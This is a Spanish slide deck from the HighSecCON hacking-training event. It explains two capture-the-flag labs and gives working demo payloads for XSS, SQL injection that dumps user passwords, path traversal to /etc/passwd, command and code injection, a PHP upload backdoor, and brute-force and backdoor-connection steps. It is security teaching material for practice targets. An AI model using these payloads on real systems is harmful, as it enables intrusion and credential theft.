Quienes somos. Eduardo Arriols Roberto Lopez

Tamaño: px

Comenzar la demostración a partir de la página:

Download "Quienes somos. Eduardo Arriols (@_Hykeos) Roberto Lopez (@leurian)"

María Rosa Castillo del Río
hace 8 años
Vistas:

1 CON

2 Quienes somos Eduardo Arriols Roberto Lopez Estudiantes de Ing. Informática en la EPS de la UAM y apasionados del mundo de la seguridad informática y el hacking. Fundadores del proyecto HighSec.

3 Que es HighSec Es una comunidad y punto de reunión para todas las personas interesadas en el mundo de la seguridad. Su principal función es enseñar de forma practica las principales técnicas en seguridad ofensiva realizadas en un test de intrusión y auditorias mediante retos y documentación propia.

Su principal función es enseñar de forma practica las principales técnicas

4 Que es HighSecCON Evento con dos partes: Resolución de retos Ponencias por gente del mundo de la seguridad Abierto a recibir propuestas para participar como ponente.

5 CTF 1 (Explicación) Escenario: Tenemos un servidor que aloja una aplicación web que sabemos es vulnerable a una gran cantidad de ataques. Objetivo: Descubrir y explotar todas las posibles vulnerabilidades entre las que se encuentran XSS, SQLi, Directory Traversal, LFI, Code Injection, Command Injection, etc

Objetivo: Descubrir y explotar todas las posibles vulnerabilidades entre las

6 XSS SQL Injection Directory Traversal File Include Code Injection Commands Injection File Upload LDAP attacks XML attacks CTF 1 (Pruebas)

7 XSS (Teoría) Inyectar código javascript en una aplicación web, con el fin de que sea ejecutado por el usuario final. Hay dos tipos: persistente y reflejado. Peligros: Robo de cookies (Sesión) Ejecución de js (Botnet JS, MiTB, Keylogger) Defacement BlackSeo

8 XSS (DEMO) Ejercicio 1: <script>alert(123)</script> Ejercicio 2: <SCRIPT>alert(123)</SCRIPT> Ejercicio 3: <iframe src="javascript:alert(123)"></iframe> Ejercicio 4: <a onmouseover="alert(123)"> XSS</a> Ejercicio 5: <a onmouseover="prompt(123)"> XSS</a> Ejercicio 6: </script><script>alert(123)</script> Ejercicio 7: ';alert(123);var+$a='hacker Ejercicio 9: #hacker<script>alert(123)</script>

onmouseover="alert(123)"> XSS</a> Ejercicio 5: <a onmouseover="prompt(123)"> XSS</a> Ejercicio 6:

9 SQL Injection (Teoría) Inyección de código SQL en las consultas que realiza la aplicación web a la BBDD con el fin de obtener o modificar datos distintos a los esperados. Peligros: Volcar la BBDD Lectura y escritura de ficheros Obtener control del servidor (Mala conf.)

modificar datos distintos a los esperados.

10 SQL Injection (DEMO) Ejercicio 1: ' and 1=0 union select id,name,passwd,4,5 from users where '1'='1 Ejercicio 2: /**/and/**/1=0/**/union/**/select/**/id,name, passwd,4,5/**/from/**/users/**/where/**/'1'='1 Ejercicio 3: Igual que el 2 Ejercicio 4: 2 and 1=0 union select id,name,passwd,4,5 from users Ejercicio 5: Igual que el 4 Ejercicio 6: 2 and 1=0 union select id,name,passwd,4,5 from users where 1=1

passwd,4,5/**/from/**/users/**/where/**/'1'='1 Ejercicio 3: Igual que el 2 Ejercicio 4: 2 and 1=0

11 Directory Traversal (Teoría) Capacidad de elevar directorios desde el actual y obtener acceso a directorios y ficheros que no se esperaban. Peligros: Acceso a información confidencial y ficheros de configuración importantes (/etc/passwd y /etc/shadow) con los que obtener acceso al servidor.

Peligros: Acceso a información confidencial y ficheros de configuración

12 Directory Traversal (DEMO) Obtenemos la url donde explotar la vulnerabilidad desde la imagen. Ejercicio 1: /dirtrav/example1.php?file=../../../../../../../../etc/passwd Ejercicio 2: /dirtrav/example2.php?file=/var/www/files/../../../etc/passwd Ejercicio 3: dirtrav/example3.php?file=../../../../../../../etc/passwd%00

php?file=/var/www/files/../../../etc/passwd Ejercicio 3: dirtrav/example3.php?file=../../../../../../../etc/passwd%00

13 File Include (Teoría) Ejecución de ficheros diferentes a los esperados, debido a una falta de filtrado en las funciones de inclusión de archivos. Peligros: Ejecucion y acceso a ficheros privados (como archivos de conf) Control del servidor subiendo una shell en php desde los logs

14 File Include (DEMO) Ejercicio 1: /fileincl/example1.php?page=/etc/passwd Ejercicio 2: /fileincl/example2.php?page=/etc/passwd%00

15 Code Injection (Teoría) Inyección de código fuente que permite interactuar de forma directa con el servidor debido a una falta de filtrado en las entradas de funciones como eval() al utilizar los datos del usuario como argumentos. Peligros: Acceso completo al servidor con la posibilidad de ejecutar comandos en el.

de funciones como eval() al utilizar los datos del usuario como argumentos.

16 Code Injection (DEMO) Ejercicio 1: ".system('uname+-a')." Ejercicio 2: id);}system('uname+-a');// Ejercicio 3: '.system('uname+-a').'

17 Command Injection (Teoría) Inyección de comandos de forma directa en el sistema operativo desde la aplicación web. Peligros: Acceso completo al servidor.

18 Command Injection (DEMO) Ejercicio 1: ;echo+"\n\nUname:";uname+-a Ejercicio 2: %0Aecho+"\n\nUname:";uname+-a Ejercicio 3: nc IP 80 GET /commandexec/example3.php?ip= únam e+-a HTTP/1.0

$0.1%0Aecho+"\n\nUname:";uname+-a Ejercicio 3: nc IP$

19 File Upload (Teoría) La aplicación permite subir ficheros que no deberían estar permitidos como ficheros que permitan ejecutar comandos o tomar control del servidor. Peligros: Subir ficheros como.php que permitan interactuar con el servidor y tomar control de el.

20 File Upload (DEMO) Ejercicio 1: Subimos un archivo.php con una backdoor muy simple utilizando la función system. Ejercicio 2: Subimos el mismo archivo pero lo renombramos como.php3

21 CTF 2 (Explicación) Escenario: Un servidor en Internet listo para ser auditado. Objetivo: Lograr entrar en el servidor y elevar privilegios tomando el control del sistema.

22 Fases del Pentest

23 CTF 2 (Pruebas) Nmap -> Versiones de los servicios Nessus -> Análisis automatizado de vulnerabilidades NetCat -> Conexión a Backdoor (1337/tcp) Finger -> Enumeración de usuarios FTP (anonymous) Medusa -> Fuerza Bruta (2222/tcp -> ssh o 901/tcp)

24 FIN Si tenéis cualquier duda ponerla en el foro ( o hacérnosla llegar por correo a info@highsec.es. El próximo reto estará disponible a partir del día 16/09/2014

25 @highsec0 Eduardo Arriols Roberto Lopez

Documentos relacionados

Christian Martorella - Vicente Díaz Edge-security Fist Conference April 2007

Christian Martorella - Vicente Díaz Edge-security Fist Conference April 2007 Indice Introducción a la seguridad de DB Motores de Bases de Datos Ataques internos Ataques externos Conclusiones Introducción